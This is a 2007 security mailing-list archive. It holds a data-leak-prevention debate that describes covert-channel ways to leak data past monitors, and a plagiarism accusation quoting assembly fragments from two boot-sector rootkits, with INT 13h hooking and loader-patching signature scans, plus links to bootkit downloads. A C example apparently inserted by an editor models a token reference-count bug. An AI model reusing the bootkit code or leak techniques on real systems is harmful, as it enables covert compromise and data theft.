Authors should submit a paper in English up to 5.000 words. The program committee will review all papers and the author of each paper will be notified of the result; the committee will contact the author if any question or more information is needed. Abstract is up to 400 words.

Submissions must be sent to : cfp(AT)it1tk1.org

Submissions should also include the following:

1. Personal Information including geographical location (country of origin/passport) and contact info.
2. Employer and/or affiliations.
3. Brief biography, list of publications or papers.
4.
Any significant presentation and/or educational experience/background.
5. Reason why this material is innovative or significant or an important tutorial.
* Optional: Samples of prepared material or outlines ready.

The information will be used only for it1tk1 including the information on the public website. If you want to remain anonymous, you have the right to use a nickname.

Speakers' Privileges
====================

* Accommodation will be provided (1 week)
* Travel expenses will be covered (flight up to 2,500 USD)
* Conference speakers night
* Parties
* Visits to tourist places (pyramids, shopping and other stuff)
* Did we say more parties?

Publication and rights
======================

Authors keep the full rights on their publication/papers but give an unrestricted right to redistribute their papers for it1tk1 and its related electronic/paper publication.

Sponsoring
==========

If you want to support the initiative and gain visibility by sponsoring, please contact us by writing an e-mail to sponsors(AT)it1tk1.org

From arunkoshy at gmail.com Wed Apr 25 08:49:36 2007
From: arunkoshy at gmail.com (Arun Koshy)
Date: Wed, 25 Apr 2007 22:49:36 +1000
Subject: [Dailydave] time for my lil opinion poll
Message-ID: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com>

A friend from the vuln research arena ( sorry .. no names etc ) told me in a convo a few hours ago that this does not work :

http://en.wikipedia.org/wiki/Information_Leak_Prevention

Would like to know the community's opinion about the whole arena .. both public and private responses ( if you can't be public ) are welcome.
From chris at ngssoftware.com Wed Apr 25 10:38:08 2007
From: chris at ngssoftware.com (Chris Anley)
Date: Wed, 25 Apr 2007 15:38:08 +0100
Subject: [Dailydave] time for my lil opinion poll
In-Reply-To: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com>
References: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com>
Message-ID: <462F67D0.4080807@ngssoftware.com>

Arun Koshy wrote:
> A friend from the vuln research arena ( sorry .. no names etc ) told
> me in a convo a few hours ago that this does not work :
>
> http://en.wikipedia.org/wiki/Information_Leak_Prevention
>
> Would like to know the community's opinion about the whole arena ..
> both public and private responses ( if you can't be public ) are
> welcome.

Your friend is possibly thinking along these lines:

http://en.wikipedia.org/wiki/Covert_channel

As an example, if the ILP system works solely at the TCP stream level, then a network client or server could pause while transmitting packets, and the host at the other end could measure the pauses. Or you could leak one bit at a time, by establishing connections in odd or even-numbered seconds. Or, since TCP packets can be delivered out of order, if you're sending 'n' packets, you can transmit a number from 1 to n! by re-ordering the packets. In all these examples the TCP stream is identical, but there's additional information the monitoring system is unaware of.

Another, more obvious method would be to include the information in any outbound random number, such as a cryptographic session key, TCP ISN, etc. If the information is supposed to be random, how can the monitoring process tell that it isn't?

--
E-MAIL DISCLAIMER

The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information.
For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402

From docbook.xml at gmail.com Wed Apr 25 10:45:12 2007
From: docbook.xml at gmail.com (Ali, Saqib)
Date: Wed, 25 Apr 2007 07:45:12 -0700
Subject: [Dailydave] time for my lil opinion poll
In-Reply-To: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com>
References: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com>
Message-ID:

what do you mean it doesn't work? These are content control systems that monitor the network gear and PCs to control the flow of the information.

Obviously they are not fail-proof, just like traditional cryptography is not "unconditionally secure"

saqib
http://www.full-disk-encryption.net

On 4/25/07, Arun Koshy wrote:
> A friend from the vuln research arena ( sorry .. no names etc ) told
> me in a convo a few hours ago that this does not work :
>
> http://en.wikipedia.org/wiki/Information_Leak_Prevention
>
> Would like to know the community's opinion about the whole arena ..
> both public and private responses ( if you can't be public ) are
> welcome.
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>

--
Saqib Ali, CISSP, ISSAP
http://www.full-disk-encryption.net

From bamm.visscher at gmail.com Wed Apr 25 11:46:04 2007
From: bamm.visscher at gmail.com (Bamm Visscher)
Date: Wed, 25 Apr 2007 09:46:04 -0600
Subject: [Dailydave] time for my lil opinion poll
In-Reply-To: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com>
References: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com>
Message-ID: <27492850704250846wf786580g8edc4a6c6d20145e@mail.gmail.com>

I've sat through a number of meetings with vendors in the space recently, plus, I stayed at a Holiday Inn last night, so that makes me an expert. Here is my take:

There is no doubt that these systems are evadable and all the vendors I spoke with accepted this fact (some had to be pressured more than others). This is especially true if you don't implement host based agents as well as the network appliances. So, if you are shopping this market for the sole purpose of preventing malicious insiders from walking away with your intellectual property, then my opinion is the dollars are better spent on providing HR with the resources it needs for doing things like proper background investigations as well as improving the workplace (crazy how loyal happy employees are).

Inadvertent data leakage is a different story. I am an 8th degree black belt in Binfu [0], so I can understand how an individual might accidentally email one customer's cost structures to another. These systems can also help enforce compliance with things like HIPAA (are you sure sensitive health information isn't being inadvertently sent in the clear?).

The best component of these systems that I have seen is their ability to discover "data at rest" (this is usually considered an additional feature).
I am a security monitoring and incident response guy by trade so, quickly identifying if (and what) sensitive data resided on compromised systems is an important piece of information when you are assessing the impact an intrusion has had on a company.

Even though I could see some value from the technology, I am still not convinced that the costs are worth it. I am probably going to end up doing a full eval on a few of the products in the space in the near future. In the end I expect the CYA factor to be a leading driver on why companies purchase products in this space and the vendors are pretty good at pushing the FUD.

Bammkkkk

[0] binfu (bin foo): The fine art of inadvertently causing unexpected system downtime, outages, and file deletions. "binfu" was first used to describe the action of "accidentally" performing an "rm -rf" on the directory /usr/bin. Once binfu has been exercised, it is best bystanders stand clear, since vulgar language and flying objects often follow the use of binfu. "My your binfu is so excellent." - Bamm to Rich (circa 2000)

On 4/25/07, Arun Koshy wrote:
> A friend from the vuln research arena ( sorry .. no names etc ) told
> me in a convo a few hours ago that this does not work :
>
> http://en.wikipedia.org/wiki/Information_Leak_Prevention
>
> Would like to know the community's opinion about the whole arena ..
> both public and private responses ( if you can't be public ) are
> welcome.
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>

--
sguil - The Analyst Console for NSM
http://sguil.sf.net

From security at sligoinc.com Wed Apr 25 12:26:32 2007
From: security at sligoinc.com (Security Guy)
Date: Wed, 25 Apr 2007 12:26:32 -0400
Subject: [Dailydave] time for my lil opinion poll
In-Reply-To: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com>
References: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com>
Message-ID: <92db0b590704250926x6796b145obe4581629be6cfac@mail.gmail.com>

I think this is one of those technical 'solutions' for a people problem (Pre-screen your personnel, make them sign NDAs, use security awareness training to remind them of sensitive information protection and consequences of violation, etc etc). You can also prevent the wider problem by not allowing business computers to connect to the Internet (gasp!)

I think there is some value for these in organizations that actually have some sort of intelligent data priority and tagging scheme, but the horse must come before the cart. I think if a company considering an extrusion prevention system first took stock of how it's currently protecting their sensitive data, they could probably find ways to spend the money more effectively.

So in short: yes they probably work, as well as IDS works (that is: not very well, requiring tons of care and feeding and understanding of the organization to be effective and needing help with encrypted traffic)

On 4/25/07, Arun Koshy wrote:
> A friend from the vuln research arena ( sorry .. no names etc ) told
> me in a convo a few hours ago that this does not work :
>
> http://en.wikipedia.org/wiki/Information_Leak_Prevention
>
> Would like to know the community's opinion about the whole arena ..
> both public and private responses ( if you can't be public ) are
> welcome.
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>

--
-Karl

From phatbuckett at gmail.com Wed Apr 25 13:57:38 2007
From: phatbuckett at gmail.com (Darren Spruell)
Date: Wed, 25 Apr 2007 10:57:38 -0700
Subject: [Dailydave] time for my lil opinion poll
In-Reply-To:
References: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com>
Message-ID: <839aec700704251057m41ea18b5nb5a35d3e13359dc8@mail.gmail.com>

On 4/25/07, Ali, Saqib wrote:
> what do you mean it doesn't work? These are content control systems
> that monitor the network gear and PCs to control the flow of the
> information.
>
> Obviously they are not fail-proof, just like traditional cryptography
> is not "unconditionally secure"

Because they don't actually do what the marketing people behind the product say they do? Because they instill a false sense of security?

http://www.mcafee.com/us/enterprise/products/data_loss_prevention/:

" Safeguard against loss of customer data, employee information, and intellectual property from all possible channels. "

Yeah, right.

DS

>
> saqib
> http://www.full-disk-encryption.net
>
>
> On 4/25/07, Arun Koshy wrote:
> > A friend from the vuln research arena ( sorry .. no names etc ) told
> > me in a convo a few hours ago that this does not work :
> >
> > http://en.wikipedia.org/wiki/Information_Leak_Prevention
> >
> > Would like to know the community's opinion about the whole arena ..
> > both public and private responses ( if you can't be public ) are
> > welcome.
> > _______________________________________________
> > Dailydave mailing list
> > Dailydave at lists.immunitysec.com
> > http://lists.immunitysec.com/mailman/listinfo/dailydave
> >
>
>
> --
> Saqib Ali, CISSP, ISSAP
> http://www.full-disk-encryption.net
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>

--
Darren Spruell
phatbuckett at gmail.com

From fw at deneb.enyo.de Wed Apr 25 13:58:20 2007
From: fw at deneb.enyo.de (Florian Weimer)
Date: Wed, 25 Apr 2007 19:58:20 +0200
Subject: [Dailydave] time for my lil opinion poll
In-Reply-To: <462F67D0.4080807@ngssoftware.com> (Chris Anley's message of "Wed, 25 Apr 2007 15:38:08 +0100")
References: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com> <462F67D0.4080807@ngssoftware.com>
Message-ID: <87slaoz683.fsf@mid.deneb.enyo.de>

* Chris Anley:

> As an example, if the ILP system works solely at the TCP stream level,
> then a network client or server could pause while transmitting packets,
> and the host at the other end could measure the pauses. Or you could
> leak one bit at a time, by establishing connections in odd or
> even-numbered seconds.

The issues are much more mundane. Companies usually don't want their sales people to leak details about their products to the competition. So they look for software that detects such leaks. The problem: The data to be protected is stored in an Excel spreadsheet -- and disconnected operation is a must.

I expect that it's possible to detect the casual leaker, but prevention is much harder (and might give too many clues to the attackers). 8-/

> NGS and NGSSoftware are trading names of Next Generation Security
> Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1
> 4BF with Company Number 04225835 and VAT Number 783096402

I think you also need to list the names of some company officials, such as the CEO.
And of course, you must archive your message for five (or ten?) years as well if you think you're forced to add that footer.

From dan at geer.org Thu Apr 26 01:24:43 2007
From: dan at geer.org (dan at geer.org)
Date: Thu, 26 Apr 2007 01:24:43 -0400
Subject: [Dailydave] time for my lil opinion poll
In-Reply-To: Your message of "Wed, 25 Apr 2007 07:45:12 PDT."
Message-ID: <20070426052443.E8C461BF924@absinthe.tinho.net>

On 4/25/07, Arun Koshy wrote:
-+-------------------------------------------------
 | A friend from the vuln research arena ( sorry .. no names etc ) told
 | me in a convo a few hours ago that this does not work :
 |
 | http://en.wikipedia.org/wiki/Information_Leak_Prevention

Disclaimer: I work for Verdasys, one of the firms listed on
http://en.wikipedia.org/wiki/Information_Leak_Prevention

"Does not work" is a little like "Bad dog" -- could you be a little more specific?

Content inspection? Crap, in my view, as it only works when the opponent does not know or care that you are watching (Pig Latin is enough crypto to defeat).

Specific blocks of this and that, e.g., the electronic equivalent of sealing the USB port with a glue gun? Well, sure, but how many ways to steal data are there...

What we (Verdasys) sell is, in blunt terms, a commercial version of the Orange Book "Reference Monitor" implemented as a data-surveillance rootkit. Compared to the others, ours is an Oxy-Acetylene torch to their paper match.

Before I go on, do we really want to have the full tilt debate?

--dan, exhausted and on lousy wireless in a cheap motel

From dave at immunityinc.com Thu Apr 26 09:54:37 2007
From: dave at immunityinc.com (Dave Aitel)
Date: Thu, 26 Apr 2007 09:54:37 -0400
Subject: [Dailydave] Happy Birthday To Brad Spengler
Message-ID: <4630AF1D.1090202@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I have to wear a suit today, otherwise I'd wear the "Brad Protects Us" tee-shirt.
For those of you who don't know Brad - grsecurity.org has some information on his main project, a "for hackers, by hackers" kernel patch. Because hackers hate getting owned while they own you.

- -dave
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGMK8bB8JNm+PA+iURAkIcAKCOMq148rKnlzDkET3wNgk8q2DJiACfa52z
6haMnFmlF/6V9H1j1U8Sniw=
=yqih
-----END PGP SIGNATURE-----

From lmh at info-pull.com Thu Apr 26 10:20:45 2007
From: lmh at info-pull.com (LMH)
Date: Thu, 26 Apr 2007 16:20:45 +0200
Subject: [Dailydave] Happy Birthday To Brad Spengler
In-Reply-To: <4630AF1D.1090202@immunityinc.com>
References: <4630AF1D.1090202@immunityinc.com>
Message-ID:

No "BigHAWK Revisited" lecture today?

Happy birthday to Brad... or as a good old, well known fellow would say, "he has enough blackhat friends that could arrange another Dirty Sanchez party for you". ;o)

On 4/26/07, Dave Aitel wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> I have to wear a suit today, otherwise I'd wear the "Brad Protects Us"
> tee-shirt.
>
> For those of you who don't know Brad - grsecurity.org has some
> information on his main project, a "for hackers, by hackers" kernel
> patch. Because hackers hate getting owned while they own you.
>
> - -dave
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (GNU/Linux)
>
> iD8DBQFGMK8bB8JNm+PA+iURAkIcAKCOMq148rKnlzDkET3wNgk8q2DJiACfa52z
> 6haMnFmlF/6V9H1j1U8Sniw=
> =yqih
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>

From dave.korn at artimi.com Thu Apr 26 14:45:17 2007
From: dave.korn at artimi.com (Dave Korn)
Date: Thu, 26 Apr 2007 19:45:17 +0100
Subject: [Dailydave] Nitin Kumar & Vipin Kumar: "please remember to give necessary credit to the authors" PKB.
Message-ID: <020901c78833$0a339210$2e08a8c0@CAM.ARTIMI.COM>

Well, I see at Security Focus

http://www.securityfocus.com/columnists/442/1

that some guys called Nitin and Vipin Kumar are claiming to have written a boot-sector rootkit called "VBootkit". There's a three page interview with them, and the source is available from their website: the links are

Front door: http://www.nvlabs.in/.
Article: "BOOT KIT: Custom boot sector based Windows 2000/XP/2003 Subversion" http://www.nvlabs.in/?q=node/11
Code download page: http://www.nvlabs.in/?q=node/14
Code URLs:
http://www.nvlabs.in/files/bootkitbasic_0.zip
http://www.nvlabs.in/files/bootkitprivilege_0.zip

Now, sometimes I feel like I'm the only person on teh internets that can actually remember more than ten minutes ago in the past, but maybe it's only journalists. Still, the moment I saw the hyperbolic headline, "0wning Vista from the boot", I wondered what was so special about this that wasn't already demonstrated by Derek and Ryan from eEye two years ago.

So, I downloaded their code. God, it sucks. I was very disappointed by the lack of any serious amount of comments; it's not easy to read. But, I could see easily they were using the same trick of hooking int 13h to stay resident that eEye demonstrated.

Suddenly, this comment jumped out at me:

----------------------------------------------------------------
        db      90h     ; to get alignment, i suppose
----------------------------------------------------------------

Huh? They suppose? Don't they even know why they did it? Then I saw the line after next:

----------------------------------------------------------------
dword_E5:       dd 0    ;something extra
----------------------------------------------------------------

That's not the kind of label someone writes in their code, and it's not the kind of comment that someone writes. That's an IDA auto-generated label. By now, I was getting seriously suspicious.
So, for comparison, here's the start of the code from eEye's BootRoot:

----------------------------------------------------------------
        cli
        xor     bx, bx
        mov     ss, bx
        mov     ss:[BOOTORG - 2], sp
        mov     sp, (BOOTORG - 2)
        push    ds
        pushad
        mov     ds, bx
;
; Reserve 1KB conventional memory for our memory-resident code
;
        dec     word ptr ds:[0413h]     ; 0040h:0013h - base memory size in KBs
        mov     ax, ds:[0413h]
        shl     ax, (10-4)              ; AX *= 1024 / 16 (convert linear address in KBs to a segment)
        mov     es, ax
;
; Copy ourselves to reserved memory and initialize the rest to zeroes
;
        cld
        mov     si, BOOTORG
        xor     di, di
        mov     cx, BOOTROOT_SIZE / 2
        rep     movsw
        xor     ax, ax
        mov     ch, (1024 - BOOTROOT_SIZE) / 2 / 100h
        rep     stosw
;
; Install our INT 13h hook
;
        mov     eax, ds:[bx + (13h*4)]
        mov     es:[INT13HANDLER - @BRCODE16_START], eax    ; store previous handler
        mov     word ptr [bx + (13h*4)], @Int13Hook         ; point INT 13h vector to our hook handler
        mov     [bx + (13h*4) + 2], es                      ; (BX = 0 from earlier)
;
; Load and execute MBR from first hard drive (do this from resident code)
;
        push    es
        push    @BootFromHDD
        retf
----------------------------------------------------------------

...
and here's the start of their code:

----------------------------------------------------------------
        cli
        xor     bx,bx
        mov     ss,bx
        mov     [ss:0x7bfe],sp
        mov     sp,0x7bfe
        push    ds
        pushad
        mov     ds,bx
        mov     ax,[0x413]
        sub     ax,2
        mov     [0x413],ax
        shl     ax,0x6
        mov     ax,CODEBASEIN1MB
        mov     es,ax
        mov     [0x7c00 + codereloc],ax
        cld
        mov     si,0x7c00
        xor     di,di
        mov     cx,0x400        ;number of bytes 2 copy to new location this is in words currently 2 kbs are loaded
        rep     movsw
        sti
        mov     ax,0x201
        mov     cl,0x2
        cdq
        cli
        mov     eax,[0x4c]
        mov     [es:INT13INTERRUPTVALUE],eax
        mov     word [0x4c], newint13handler
        mov     [0x4e],es
        sti
directjumpwithouthook:
        push    es
        push    word newmemorycodestart
        retf
newmemorycodestart:
----------------------------------------------------------------

Apart from changing "dec word ptr ds:[0413h]" into a load-subtract-store sequence, because they wanted to reserve 2kB instead of one, and apart from changing the amount of memory copied to 2kB, and replacing the sequence

        xor     ax, ax
        mov     ch, (1024 - BOOTROOT_SIZE) / 2 / 100h
        rep     stosw

that pads to the top of memory with zeros by the meaningless (since eax is immediately overwritten anyway) sequence[*]:

        sti
        mov     ax,0x201
        mov     cl,0x2
        cdq
        cli

it's identical.

Or take a look at the signature of bytes they search for to overwrite in the int13 hook:

eEye
----------------------------------------------------------------
@Int13Hook_scan_loop:
        ; 8B F0         MOV ESI, EAX
        ; 85 F6         TEST ESI, ESI
        ; 74 21         JZ $+23h
        ; 80 3D ...     CMP BYTE PTR [ofs32], imm8
        ; (the first 6 bytes of this signature exist in other modules!)
        repne   scasb
        jne     short @Int13Hook_scan_done
        cmp     dword ptr es:[di], 74F685F0h
        jne     short @Int13Hook_scan_loop
        cmp     word ptr es:[di+4], 8021h
        jne     short @Int13Hook_scan_loop
        mov     word ptr es:[di-1], 15FFh       ; FFh/15h/xx/xx/xx/xx: CALL NEAR [ofs32]
----------------------------------------------------------------

and now Vbootkit:

----------------------------------------------------------------
scanloop:
        repne   scasb
        jnz     scandone
        cmp     dword [es:di],0x74f685f0        ;these are signature bytes
        jnz     scanloop
        cmp     word [es:di+0x4],0x8021
        jnz     scanloop
        mov     word [es:di-0x1],0x15ff
----------------------------------------------------------------

I've seen enough. It's transparently obvious that these self-publicising clowns have used IDA to disassemble BootRoot (Guys! Didn't you know it comes with source? How dumb are you?), and have crudely hacked out the very very clever ndis-patching backdoor payload written by Derek and Ryan and replaced it with their own crappy amateurish functionality.

Just to really put the icing on the cake, and then put the cherry on the icing, these code-stealing tossers placed the following pitiable request at the top of their assembler source:

----------------------------------------------------------------
;If you develop anything using this code, please remember to give necessary credit to the authors
----------------------------------------------------------------

Nitin? Vipin? I agree; we all should remember to give necessary credit to the authors: Derek Soeder and Ryan Permeh, whose innovative hard work deserves praise. How come you guys forgot to, huh?

cheers,
DaveK

[*] Footnote: I haven't looked at the opcodes for these two sequences, but what's the betting they're mostly the same bytes, and these guys have somehow managed to get a framing error when IDAing it?

--
Can't think of a witty .sigline today....
From dave.korn at artimi.com Thu Apr 26 17:22:33 2007
From: dave.korn at artimi.com (Dave Korn)
Date: Thu, 26 Apr 2007 22:22:33 +0100
Subject: [Dailydave] Nitin Kumar & Vipin Kumar: "please remember to give necessary credit to the authors" PKB.
In-Reply-To: <200704262208.40143.ed@bsd.it>
References: <020901c78833$0a339210$2e08a8c0@CAM.ARTIMI.COM> <200704262208.40143.ed@bsd.it>
Message-ID: <023c01c78849$01415f00$2e08a8c0@CAM.ARTIMI.COM>

On 26 April 2007 21:09, Ed wrote:
> On Thursday 26 April 2007 20:45, Dave Korn wrote:
>> Code download page: http://www.nvlabs.in/?q=node/14
>
> The source code you have analyzed is not what we are talking about in the
> interview.

Ah, I must admit to not having realized that. However, I will point out that what they describe in their paper and presentation is the exact same method: hook int 13h at startup, patch each stage as it loads. The advanced (privilege escalation) version on that page does the raise-cmd.exe-every-30-seconds trick in the exact same way.

I'd also like to point out that their code is buggy. They copy the token pointer from one _EPROCESS to another. They don't call ObReferenceObjectByPointer. Guess what? As soon as you exit that cmd.exe, it will dereference the token once. That's the system process' token, that is. Open another cmd.exe, wait 30 seconds for it to be elevated, close it again - the system process loses one more reference count on its token. Do it enough times, the reference count will fall to zero, the object manager will deallocate the system process' token, but the pointer will still be there in the system process' _EPROCESS block. I reckon you'd probably BSoD within milliseconds, but maybe it might last for a while - until the page gets swapped out or deallocated, or something overwrites it...
I will concede that they've done at least some genuine work in reversing the integrity checks in the loader, but that's fairly routine stuff; bypassing a check by altering the test in a branch instruction is pretty trivial, it's about on the level of finding an infinite lives poke in a computer game.

> They have not shared the code for Vista version, but as far as I
> know none of the attendees of their recent talks at BlackHat and HITB found
> anything "already seen".
>
> http://www.blackhat.com/html/bh-europe-07/bh-eu-07-speakers.html#Kumar
> http://conference.hitb.org/hitbsecconf2007dubai/?page_id=116

That is pretty remarkable. I would have expected somebody to say something during the q'n'a session that most talks have at the end, if only to ask them "In what way does your technique *differ* from BootRoot?" Were you there yourself? Is there any online video or audio of their session? It's not like we would necessarily have heard if one of the attendees did find they'd already seen it.

> P.S. This is not a tactic to force them to make their source code public,
> right?

Well, no, it's no tactic; I really thought that was the source they're referring to, and since the source they /are/ referring to does exactly the same things by using exactly the same techniques, I think it's reasonable to infer that they've probably got most of the same code in the vista version.

My only intention was to call them out on their plagiarism. They crudely hacked about and ported eEye's code and didn't credit them. They've plugged in new payloads, but swapping one shellcode for another isn't news. The fact that the code that they /have/ chosen to release demonstrates a very poor understanding of kernel coding, and the fact that there's stuff in their code that they don't know why it's there or what it's for, makes me doubt they have anything extraordinary that they aren't showing us.

cheers,
DaveK

--
Can't think of a witty .sigline today....
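Dave Korn's reasoning in the message above (copying a token pointer between processes without taking a reference, so that each process exit drops a count the owner never gave up, until the object manager frees a token the system process still points at) is a plain reference-counting argument, and it can be checked outside the kernel. The block below is an added example, not code from the thread, from BootRoot or from VBootkit: a user-mode model in C in which a "token" is a refcounted object, a "process" holds one, and process exit releases it. The buggy and correct assignment routines, the SYSTEM_TOKEN_REFS starting count and all function names are the example's own; the Windows names appear only in comments for orientation.

```c
/* Added example (not from the thread): a user-mode model of the token
 * reference-count bug. "Tokens" and "processes" here are plain structs;
 * nothing touches a real kernel. Exiting a process releases the token it
 * points at, exactly once. If the pointer was copied without taking a
 * reference, that release is charged to the original owner. */
#include <stdio.h>

#define SYSTEM_TOKEN_REFS 3   /* constructed: references other holders keep on the system token */

struct token {
    long refcount;
    int  freed;     /* 1 once the count hit zero and the object was "deallocated" */
};

struct process {
    struct token *token;
};

/* Object-manager style release: the object goes away when the count hits zero. */
static void token_dereference(struct token *t)
{
    t->refcount--;
    if (t->refcount == 0)
        t->freed = 1;
}

/* Elevation done right: reference the new token before pointing at it,
 * and release the one being replaced. The increment is the step the
 * thread says was skipped (ObReferenceObjectByPointer in kernel terms). */
static void set_token_correct(struct process *dst, struct token *newtok)
{
    newtok->refcount++;
    token_dereference(dst->token);
    dst->token = newtok;
}

/* The bug as described: only the pointer is copied. No reference is taken
 * on the new token and the process's own token is never released. */
static void set_token_buggy(struct process *dst, struct token *newtok)
{
    dst->token = newtok;
}

/* Run n cycles of "start cmd.exe, elevate it, close it" against a model
 * system token and return the system token's state afterwards. */
static struct token simulate(int n, int use_buggy)
{
    struct token sys_tok = { SYSTEM_TOKEN_REFS, 0 };
    for (int i = 0; i < n; i++) {
        struct token cmd_tok = { 1, 0 };        /* the new process's own token */
        struct process cmd = { &cmd_tok };
        if (use_buggy)
            set_token_buggy(&cmd, &sys_tok);
        else
            set_token_correct(&cmd, &sys_tok);
        token_dereference(cmd.token);           /* process exit releases what it holds */
    }
    return sys_tok;   /* with the bug, sys_tok is now short by one reference per cycle */
}

long system_token_refcount_after(int n, int use_buggy)
{
    return simulate(n, use_buggy).refcount;
}

int system_token_freed_after(int n, int use_buggy)
{
    return simulate(n, use_buggy).freed;
}

int main(void)
{
    for (int n = 1; n <= 4; n++)
        printf("buggy,   %3d cycles: system token refcount=%ld freed=%d\n", n,
               system_token_refcount_after(n, 1), system_token_freed_after(n, 1));
    printf("correct, 100 cycles: system token refcount=%ld freed=%d\n",
           system_token_refcount_after(100, 0), system_token_freed_after(100, 0));
    return 0;
}
```

With SYSTEM_TOKEN_REFS set to 3, the buggy path frees the system token on the third cycle while the system process still holds a pointer to it, which is the dangling-pointer state the message predicts; the correct path leaves the count at 3 however many cycles run, because every copy of the pointer was paid for with a reference.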
From cisoguy at gmail.com Thu Apr 26 17:26:20 2007 From: cisoguy at gmail.com (Jeff Moore) Date: Thu, 26 Apr 2007 14:26:20 -0700 Subject: [Dailydave] Nitin Kumar & Vipin Kumar: "please remember to give necessary credit to the authors" PKB. In-Reply-To: <020901c78833$0a339210$2e08a8c0@CAM.ARTIMI.COM> References: <020901c78833$0a339210$2e08a8c0@CAM.ARTIMI.COM> Message-ID: <97775f7a0704261426g3b8562cbgc2f48348fdd78a56@mail.gm